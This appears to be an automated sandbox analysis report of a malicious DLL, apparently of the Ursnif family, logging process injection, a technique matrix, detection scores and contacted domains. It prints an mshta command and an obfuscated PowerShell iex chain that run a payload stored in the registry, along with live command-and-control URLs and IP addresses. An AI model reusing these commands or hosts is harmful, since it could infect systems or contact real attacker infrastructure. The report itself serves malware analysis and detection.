    Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFE468F1580 protect: page execute and read and write
    Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFE468F1580 protect: page execute read
    Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFE468F1580 protect: page execute and read and write
    Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFE468F1580 protect: page execute and read and write
    Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 23E0000 protect: page execute and read and write
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3320 base: 286000 value: 00
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3320 base: 7FFE468F1580 value: EB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3320 base: 23F0000 value: 80
    Source: C:\Windows\System32\control.exeMemory written: PID: 3320 base: 28C000 value: 00
    Source: C:\Windows\System32\control.exeMemory written: PID: 3320 base: 7FFE468F1580 value: EB
    Source: C:\Windows\System32\control.exeMemory written: PID: 3320 base: 23E0000 value: 80
    Source: C:\Windows\System32\control.exeMemory written: PID: 3320 base: 7FFE468F1580 value: 40
    Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 5160
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3320
    Source: C:\Windows\System32\control.exeThread register set: target process: 3320
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 468F1580
    Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 468F1580
    Source: C:\Windows\System32\control.exeThread created: unknown EIP: 468F1580
    Source: unknownProcess created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>qnma='wscript.shell';resizeto(0,2);eval(new activexobject(qnma).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([system.text.encoding]::ascii.getstring((cyynsofy "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([system.text.encoding]::ascii.getstring((cyynsofy "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([System.Text.Encoding]::ASCII.GetString((cyynsofy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE9EF.tmp" "c:\Users\user\AppData\Local\Temp\CSC256FD05AD86B46298536785867B2F65B.TMP"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF4AD.tmp" "c:\Users\user\AppData\Local\Temp\CSCCB299674C9DE4DC69C5A44CA79DFE4B3.TMP"
    Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
    Source: explorer.exe, 00000017.00000000.625926261.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.669513558.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.686983756.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
    Source: explorer.exe, 00000017.00000000.669708180.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.625926261.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.675019770.00000000056F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000017.00000000.668777721.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.625926261.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.669513558.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: explorer.exe, 00000017.00000000.625926261.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.669513558.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.686983756.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D5710 cpuid
    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D28A7 SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D3BEF GetVersionExA,wsprintfA,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D5710 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Windows Management Instrumentation
    Path Interception812
    Process Injection
    1
    Obfuscated Files or Information
    OS Credential Dumping1
    System Time Discovery
    Remote Services11
    Archive Collected Data
    Exfiltration Over Other Network Medium2
    Ingress Tool Transfer
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    Data Encrypted for Impact
    Default Accounts2
    Native API
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    File Deletion
    LSASS Memory1
    Account Discovery
    Remote Desktop Protocol1
    Email Collection
    Exfiltration Over Bluetooth2
    Encrypted Channel
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts1
    Command and Scripting Interpreter
    Logon Script (Windows)Logon Script (Windows)1
    Masquerading
    Security Account Manager1
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
    Virtualization/Sandbox Evasion
    NTDS25
    System Information Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer12
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script812
    Process Injection
    LSA Secrets11
    Security Software Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    Rundll32
    Cached Domain Credentials31
    Virtualization/Sandbox Evasion
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync3
    Process Discovery
    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
    Application Window Discovery
    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
    System Owner/User Discovery
    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing11
    Remote System Discovery
    Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
    System Network Configuration Discovery
    Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 752294 Sample: 7078612.dll Startdate: 23/11/2022 Architecture: WINDOWS Score: 100 63 Snort IDS alert for network traffic 2->63 65 Multi AV Scanner detection for domain / URL 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 4 other signatures 2->69 9 mshta.exe 19 2->9         started        11 loaddll32.exe 1 2->11         started        process3 process4 13 powershell.exe 1 28 9->13         started        17 cmd.exe 1 11->17         started        19 conhost.exe 11->19         started        file5 55 C:\Users\user\AppData\...\ogaysol0.cmdline, Unicode 13->55 dropped 99 Injects code into the Windows Explorer (explorer.exe) 13->99 101 Writes to foreign memory regions 13->101 103 Modifies the context of a thread in another process (thread injection) 13->103 105 2 other signatures 13->105 21 explorer.exe 1 3 13->21 injected 24 csc.exe 3 13->24         started        27 csc.exe 3 13->27         started        29 conhost.exe 13->29         started        31 rundll32.exe 6 17->31         started        signatures6 process7 dnsIp8 83 Changes memory attributes in foreign processes to executable or writable 21->83 85 Self deletion via cmd or bat file 21->85 87 Disables SPDY (HTTP compression, likely to perform web injects) 21->87 89 Creates a thread in another existing process (thread injection) 21->89 34 cmd.exe 1 21->34         started        37 RuntimeBroker.exe 21->37 injected 51 C:\Users\user\AppData\Local\...\ogaysol0.dll, PE32 24->51 dropped 39 cvtres.exe 1 24->39         started        53 C:\Users\user\AppData\Local\...\bplkxjdz.dll, PE32 27->53 dropped 41 cvtres.exe 1 27->41         started        57 supernetwork.top 62.173.149.9, 49715, 80 SPACENET-ASInternetServiceProviderRU Russian Federation 31->57 59 internetcoca.in 172.105.103.207, 49718, 80 LINODE-APLinodeLLCUS United States 31->59 61 3 other IPs or domains 31->61 91 System process connects to network (likely due to code injection or exploit) 31->91 93 Writes to foreign memory regions 31->93 95 Modifies the context of a thread in another process (thread injection) 31->95 97 2 other signatures 31->97 43 control.exe 1 31->43         started        file9 signatures10 process11 signatures12 71 Uses ping.exe to sleep 34->71 73 Uses ping.exe to check the status of other devices and networks 34->73 45 conhost.exe 34->45         started        47 PING.EXE 1 34->47         started        75 Changes memory attributes in foreign processes to executable or writable 43->75 77 Injects code into the Windows Explorer (explorer.exe) 43->77 79 Writes to foreign memory regions 43->79 81 4 other signatures 43->81 49 rundll32.exe 43->49         started        process13

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    7078612.dll100%Joe Sandbox ML
    No Antivirus matches
    SourceDetectionScannerLabelLinkDownload
    3.2.rundll32.exe.50d0000.0.unpack100%AviraHEUR/AGEN.1245293Download File
    SourceDetectionScannerLabelLink
    meganetwork.top3%VirustotalBrowse
    internetcoca.in20%VirustotalBrowse
    supernetwork.top3%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://constitution.org/usdeclar.txt0%URL Reputationsafe
    http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
    http://31.207.46.124/jerry/jTzxAnqL2OvVUr_2F/fauV7gAxn9qx/8pFCJL9tnDU/iLzaMJ4HX1GykO/HoC2Mc7MKhdMVEZs5LHn1/1_2BHT6MZAolHFOS/6QcVb6Sy1jmNhbf/GYszPrGfJFenuaRQz6/_2BhFQScX/2I2_2FVeVKW5cCoy7gT4/8KYwuw3rx60555o08Kn/opCh843XnHy29nfuXF6b2z/huTk_2FUjzUDI/ISxuKPlx/DZKqk4ugdLqCYc3dzjZ_2Br/21q0mwi2jT/PIT_2FnEyJ3MqtVh6/qexCz0xFpyCT/BYpr5_2B38q/mb5tW8uXYlLBsL/HRJTV7U9DpT/Lb.bob0%Avira URL Cloudsafe
    http://31.207.46.124/jerry/3nn_2BNEVXd0Rxht2AWGTxC/GW4p8XGNLb/FjhKQ84fH_2BkNicF/oP5tQPlnMrJr/VzmSazt0%Avira URL Cloudsafe
    http://internetcoca.in/jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/l100%Avira URL Cloudmalware
    http://meganetwork.top/jerry/hMt_2FkMsACDp/Ggtycrpr/3jyWUhPR8uVsI6k_2Bbu1hb/kdbdt_2BOm/9tP_2BQtD9vLJ0%Avira URL Cloudsafe
    http://31.207.46.124/jerry/3nn_2BNEVXd0Rxht2AWGTxC/GW4p8XGNLb/FjhKQ84fH_2BkNicF/oP5tQPlnMrJr/VzmSaztxByX/Gj2CVVFo49mQFm/C9zaruRo3JRcHrjSr91x3/QFYBC_2FsxN_2B7X/uufaTAjpOm99699/Pq_2FSETrsZSqN9Ojz/3qeuXW2xr/R0a72t7BsPAzZ_2BbGig/RJ4QPZizbCIE_2Fbc3V/bnU9fiqNJ0ptmBxGj2iZqV/2_2BtpYpuaB39/FW0ST0qr/ePsn6GFPOwexxSy3EgaplHS/uHjfw_2BI_/2BU_2B8F8OF00pKIM/YJkKjo7czRDc/E_2BThKsX/cG_2Fr.bob0%Avira URL Cloudsafe
    http://supernetwork.top/jerry/c5L4i7gs7U/TPlgCZUjVlFX76S6w/ptrxQO4jUOhI/F6ePNzRyuKF/MbNtzcp0Ju65aR/ZLc8q9AvlDxusKBXZEkxW/7UMIMirPk3DmAiEd/MIUggpPiQ7ixyfB/FE8tNplPzMQkKS2ZFu/JXFIU12Aw/jv5mVYFsQ20lg4INnqbs/F8R3I0LYx88osTnvgV0/etG2XQldFgo6x4JgYsuQNF/j4JQ96Ft17Rz7/eCxN97dQ/rJhcjYfddaM8eJW_2Fean2z/A92cM0Ky22/lOBKLw85du6YHY_2B/3g2GAbm.bob0%Avira URL Cloudsafe
    http://31.207.46.124/jerry/jTzxAnqL2OvVUr_2F/fauV7gAxn9qx/8pFCJL9tnDU/iLzaMJ4HX1GykO/HoC2Mc7MKhdMVEZ0%Avira URL Cloudsafe
    http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
    http://supernetwork.top/E0%Avira URL Cloudsafe
    http://internetcoca.in/100%Avira URL Cloudmalware
    http://supernetwork.top/%0%Avira URL Cloudsafe
    http://supernetwork.top/0%Avira URL Cloudsafe
    http://31.207.46.124/jerry/5BN0ICz4uWiAkFly3NWE/wdb3AqkjVSwyFUhuqrz/lHc_2B4wxe4nLA1HUOqfnP/QlJbnXjOv0%Avira URL Cloudsafe
    http://meganetwork.top/jerry/hMt_2FkMsACDp/Ggtycrpr/3jyWUhPR8uVsI6k_2Bbu1hb/kdbdt_2BOm/9tP_2BQtD9vLJNuMH/RpW6bg0QRvZX/QXfPDGL10GT/SdaapIAklDbfEO/Uj_2BAmamwU2u8BHod3aP/PgD0dTDTJEMSc0UK/j1e9AdZnRhxmLd2/iyZSWXfqsPP5Mz2_2F/RxfeMhVZi/snsYr1rBTn9DbB3n1htJ/THaNUdrjEpMaPV5FZB0/hnSI3F95hi8RSrq2PqAvJg/NhyoyNMSlw300/RuRhnMAi/yuKjfRG8BZDb0ZtEsV/Y0c.bob0%Avira URL Cloudsafe
    http://internetcoca.in/a100%Avira URL Cloudmalware
    http://supernetwork.top/jerry/c5L4i7gs7U/TPlgCZUjVlFX76S6w/ptrxQO4jUOhI/F6ePNzRyuKF/MbNtzcp0Ju65aR/Z0%Avira URL Cloudsafe
    http://internetcoca.in/jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob100%Avira URL Cloudmalware
    http://31.207.46.124/jerry/5BN0ICz4uWiAkFly3NWE/wdb3AqkjVSwyFUhuqrz/lHc_2B4wxe4nLA1HUOqfnP/QlJbnXjOv_2Ft/Q5KyRgYr/iv5NSA792h1xHcDS5L6fsEG/6f6Mo_2Fxe/zRCCWBAwTeLJqLbV9/kqNgWULptALz/6SvcsPi5EHX/ePWs4WCPyL8a8x/7zSS0_2F0FPHafzsv8Nrj/_2FvbJqIrbuIliTu/28Zs8gl0EBncgLE/E0Xb7wwqBhrlCP2lDF/LuKqKVbSw/I0P0F2TMmM1CY00Wt6n5/Qvz8fbopIWFtWKI6Q1E/CrYECeKd/SC2ahZciZ/j0v83.bob0%Avira URL Cloudsafe
    http://meganetwork.top/0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    meganetwork.top
    31.41.44.51
    truetrueunknown
    internetcoca.in
    172.105.103.207
    truetrueunknown
    supernetwork.top
    62.173.149.9
    truetrueunknown
    NameMaliciousAntivirus DetectionReputation
    http://31.207.46.124/jerry/jTzxAnqL2OvVUr_2F/fauV7gAxn9qx/8pFCJL9tnDU/iLzaMJ4HX1GykO/HoC2Mc7MKhdMVEZs5LHn1/1_2BHT6MZAolHFOS/6QcVb6Sy1jmNhbf/GYszPrGfJFenuaRQz6/_2BhFQScX/2I2_2FVeVKW5cCoy7gT4/8KYwuw3rx60555o08Kn/opCh843XnHy29nfuXF6b2z/huTk_2FUjzUDI/ISxuKPlx/DZKqk4ugdLqCYc3dzjZ_2Br/21q0mwi2jT/PIT_2FnEyJ3MqtVh6/qexCz0xFpyCT/BYpr5_2B38q/mb5tW8uXYlLBsL/HRJTV7U9DpT/Lb.bobtrue
    • Avira URL Cloud: safe
    unknown
    http://supernetwork.top/jerry/c5L4i7gs7U/TPlgCZUjVlFX76S6w/ptrxQO4jUOhI/F6ePNzRyuKF/MbNtzcp0Ju65aR/ZLc8q9AvlDxusKBXZEkxW/7UMIMirPk3DmAiEd/MIUggpPiQ7ixyfB/FE8tNplPzMQkKS2ZFu/JXFIU12Aw/jv5mVYFsQ20lg4INnqbs/F8R3I0LYx88osTnvgV0/etG2XQldFgo6x4JgYsuQNF/j4JQ96Ft17Rz7/eCxN97dQ/rJhcjYfddaM8eJW_2Fean2z/A92cM0Ky22/lOBKLw85du6YHY_2B/3g2GAbm.bobtrue
    • Avira URL Cloud: safe
    unknown
    http://31.207.46.124/jerry/3nn_2BNEVXd0Rxht2AWGTxC/GW4p8XGNLb/FjhKQ84fH_2BkNicF/oP5tQPlnMrJr/VzmSaztxByX/Gj2CVVFo49mQFm/C9zaruRo3JRcHrjSr91x3/QFYBC_2FsxN_2B7X/uufaTAjpOm99699/Pq_2FSETrsZSqN9Ojz/3qeuXW2xr/R0a72t7BsPAzZ_2BbGig/RJ4QPZizbCIE_2Fbc3V/bnU9fiqNJ0ptmBxGj2iZqV/2_2BtpYpuaB39/FW0ST0qr/ePsn6GFPOwexxSy3EgaplHS/uHjfw_2BI_/2BU_2B8F8OF00pKIM/YJkKjo7czRDc/E_2BThKsX/cG_2Fr.bobtrue
    • Avira URL Cloud: safe
    unknown
